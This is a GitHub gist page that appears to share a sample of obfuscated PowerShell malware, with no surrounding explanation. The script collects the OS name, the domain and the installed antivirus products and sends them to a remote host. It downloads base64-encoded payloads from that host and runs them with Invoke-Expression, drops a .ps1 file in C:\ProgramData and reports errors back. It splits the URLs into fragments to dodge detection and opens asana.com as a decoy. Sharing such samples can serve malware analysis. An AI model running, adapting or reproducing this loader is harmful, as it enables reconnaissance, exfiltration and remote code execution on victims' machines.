Created
June 15, 2024 16:12
-
-
Save trevorsaudi/6d89accab3b06d02048fdd33d6d22bc1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $udGXjGVXGXbtYwiRfqjVk = Start-Job -ScriptBlock { | |
| $SyXSoDNGGAhAAe = (Get-WmiObject -Class Win32_OperatingSystem).Caption | |
| $Cg = '25' | |
| $BmeBoy = '39b24536-f33f-48ee-9d63-4723e42e16f9' | |
| $hr = [System.Net.WebUtility]::UrlEncode($SyXSoDNGGAhAAe) | |
| $hhowUyysZxUVhmaQelBiPDRiUn = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain | |
| $LhvJgxbikeJRfx = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct | |
| $JDJDUfKZAfHGJBoPloDnifXiw = $LhvJgxbikeJRfx | ForEach-Object { | |
| $_.displayName | |
| } | |
| $mYoLehsZuDcJpwtZYnRgAIIgo = $JDJDUfKZAfHGJBoPloDnifXiw -join ", " | |
| $lXDhTMDJqSAFnn = "w" | |
| $HKDoaKaxv = (New-Guid).ToString() | |
| $aTebwwaowsbbrUUTopUZpsjZ = New-Object Net.WebClient | |
| $aTebwwaowsbbrUUTopUZpsjZ.Headers.Add("User-Agent", "myUserAgentHere") | |
| $YpU = "?oELLrQJKoZhtDhWs=$mYoLehsZuDcJpwtZYnRgAIIgo&UyMWxrWzgLjhkx=$hhowUyysZxUVhmaQelBiPDRiUn&dVLdrGnckGwZJ=$hr&vKRZZRK=$($Cg)&pHHpfHApJIsnDpyQxHyJTHfM=$BmeBoy&File=file&AeAypRLxCibLOehARxuqWNR=$lXDhTMDJqSAFnn&IhU=$HKDoaKaxv" | |
| $UJOBBmKBtPlyyQBndyytBczBv = "htt"+"p"+"s://"+"eprst251.boo/73689d8a"+"-"+"25b4"+"-"+"41cf"+"-"+"b693"+"-"+"05591ed804a7"+"-"+"7433f7b1"+"-"+"9997"+"-"+"477b"+"-"+"aadc"+"-"+"5a6e8d233c61" + "$($YpU)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($UJOBBmKBtPlyyQBndyytBczBv) | |
| $viSrdkNrrPrYdF = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($xsLfdudkQBktwfQQjItfw)) | |
| $gysZgsffxZppKIgfHU = "usradm" | |
| if ($viSrdkNrrPrYdF.Contains($gysZgsffxZppKIgfHU)) { | |
| try { | |
| $LQ = "RpVpRNJ.ps1" | |
| $K = "C:\ProgramData\$($LQ)" | |
| $viSrdkNrrPrYdF | Out-File -FilePath $K | |
| $CoNC = $LQ | |
| $YpU = "?KblgSClgegJMev=$($LQ)&pHHpfHApJIsnDpyQxHyJTHfM=$($BmeBoy)" | |
| $BvikSaFXwYDk = "htt"+"p"+"s://"+"eprst251.b"+"o"+""+"o"+"/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01" + "$($YpU)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($BvikSaFXwYDk) | |
| $viSrdkNrrPrYdF = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($xsLfdudkQBktwfQQjItfw)) | |
| Invoke-Expression $viSrdkNrrPrYdF | |
| } | |
| catch { | |
| $HcEAjXEDFgAUtMMiPwLicU = $_.Exception.Message | |
| $icFJZsoaoaorsrDtZWvtoFQitW = "?IhU=$($HKDoaKaxv)&HZsZsos=$($HcEAjXEDFgAUtMMiPwLicU)" | |
| $jmtjjvjr = "htt"+"p"+"s://"+""+"e"+"prst251.boo/223dc805-5605-4a0b-b828-cdad1b84126"+"e"+"-79d39c2c-0f10-48d1-9"+"e"+"df-c18a784"+"e"+"fba0" + "$($icFJZsoaoaorsrDtZWvtoFQitW)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($jmtjjvjr) | |
| try { | |
| $NToddpkHJ = "?aklshdjahsjdh=$($Cg)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($HKDoaKaxv))" | |
| $NQdQ = "htt"+"p"+"s://"+""+"e"+""+"p"+""+"r"+""+"s"+""+"t"+""+"2"+""+"5"+""+"1"+""+"."+""+"b"+""+"o"+""+"o"+""+"/"+""+"9"+""+"7"+""+"4"+""+"a"+""+"f"+""+"a"+""+"0"+""+"a"+""+"-"+""+"d"+""+"3"+""+"3"+""+"4"+""+"-"+""+"4"+""+"8"+""+"e"+""+"c"+""+"-"+""+"a"+""+"0"+""+"d"+""+"4"+""+"-"+""+"4"+""+"c"+""+"c"+""+"1"+""+"4"+""+"e"+""+"f"+""+"a"+""+"7"+""+"3"+""+"0"+""+"c"+""+"-"+""+"1"+""+"d"+""+"3"+""+"d"+""+"0"+""+"4"+""+"4"+""+"a"+""+"-"+""+"e"+""+"6"+""+"5"+""+"4"+""+"-"+""+"4"+""+"1"+""+"e"+""+"3"+""+"-"+""+"a"+""+"d"+""+"3"+""+"2"+""+"-"+""+"3"+""+"8"+""+"a"+""+"2"+""+"9"+""+"3"+""+"4"+""+"3"+""+"9"+""+"3"+""+"e"+""+"4"+"" + "$($NToddpkHJ)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($NQdQ) | |
| $viSrdkNrrPrYdF = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($xsLfdudkQBktwfQQjItfw)) | |
| Invoke-Expression $viSrdkNrrPrYdF | |
| } | |
| catch { | |
| $HcEAjXEDFgAUtMMiPwLicU = $_.Exception.Message | |
| $icFJZsoaoaorsrDtZWvtoFQitW = "?IhU=$($HKDoaKaxv)&HZsZsos=$($HcEAjXEDFgAUtMMiPwLicU)" | |
| $jmtjjvjr = "htt"+"p"+"s://"+""+"e"+"prst251.boo/223dc805-5605-4a0b-b828-cdad1b84126"+"e"+"-79d39c2c-0f10-48d1-9"+"e"+"df-c18a784"+"e"+"fba0" + "$($icFJZsoaoaorsrDtZWvtoFQitW)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($jmtjjvjr) | |
| } | |
| } | |
| } else { | |
| try { | |
| Invoke-Expression $viSrdkNrrPrYdF | |
| } | |
| catch { | |
| $HcEAjXEDFgAUtMMiPwLicU = $_.Exception.Message | |
| $icFJZsoaoaorsrDtZWvtoFQitW = "?IhU=$($HKDoaKaxv)&HZsZsos=$($HcEAjXEDFgAUtMMiPwLicU)" | |
| $jmtjjvjr = "htt"+"p"+"s://"+""+"e"+"prst251.boo/223dc805-5605-4a0b-b828-cdad1b84126"+"e"+"-79d39c2c-0f10-48d1-9"+"e"+"df-c18a784"+"e"+"fba0" + "$($icFJZsoaoaorsrDtZWvtoFQitW)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($jmtjjvjr) | |
| try { | |
| $NToddpkHJ = "?aklshdjahsjdh=$($Cg)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($HKDoaKaxv))" | |
| $NQdQ = "htt"+"p"+"s://"+""+"e"+""+"p"+""+"r"+""+"s"+""+"t"+""+"2"+""+"5"+""+"1"+""+"."+""+"b"+""+"o"+""+"o"+""+"/"+""+"9"+""+"7"+""+"4"+""+"a"+""+"f"+""+"a"+""+"0"+""+"a"+""+"-"+""+"d"+""+"3"+""+"3"+""+"4"+""+"-"+""+"4"+""+"8"+""+"e"+""+"c"+""+"-"+""+"a"+""+"0"+""+"d"+""+"4"+""+"-"+""+"4"+""+"c"+""+"c"+""+"1"+""+"4"+""+"e"+""+"f"+""+"a"+""+"7"+""+"3"+""+"0"+""+"c"+""+"-"+""+"1"+""+"d"+""+"3"+""+"d"+""+"0"+""+"4"+""+"4"+""+"a"+""+"-"+""+"e"+""+"6"+""+"5"+""+"4"+""+"-"+""+"4"+""+"1"+""+"e"+""+"3"+""+"-"+""+"a"+""+"d"+""+"3"+""+"2"+""+"-"+""+"3"+""+"8"+""+"a"+""+"2"+""+"9"+""+"3"+""+"4"+""+"3"+""+"9"+""+"3"+""+"e"+""+"4"+"" + "$($NToddpkHJ)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($NQdQ) | |
| $viSrdkNrrPrYdF = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($xsLfdudkQBktwfQQjItfw)) | |
| Invoke-Expression $viSrdkNrrPrYdF | |
| } | |
| catch { | |
| $HcEAjXEDFgAUtMMiPwLicU = $_.Exception.Message | |
| $icFJZsoaoaorsrDtZWvtoFQitW = "?IhU=$($HKDoaKaxv)&HZsZsos=$($HcEAjXEDFgAUtMMiPwLicU)" | |
| $jmtjjvjr = "htt"+"p"+"s://"+""+"e"+"prst251.boo/223dc805-5605-4a0b-b828-cdad1b84126"+"e"+"-79d39c2c-0f10-48d1-9"+"e"+"df-c18a784"+"e"+"fba0" + "$($icFJZsoaoaorsrDtZWvtoFQitW)" | |
| $xsLfdudkQBktwfQQjItfw = $aTebwwaowsbbrUUTopUZpsjZ.DownloadString($jmtjjvjr) | |
| } | |
| } | |
| } | |
| } | |
| $JNWgNBrgNHmJNEDiBS= "htt"+"p"+"s://"+"asana.co"+"m"+"/" | |
| Start-Process $JNWgNBrgNHmJNEDiBS | |
| Receive-Job -Job $udGXjGVXGXbtYwiRfqjVk -Wait |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment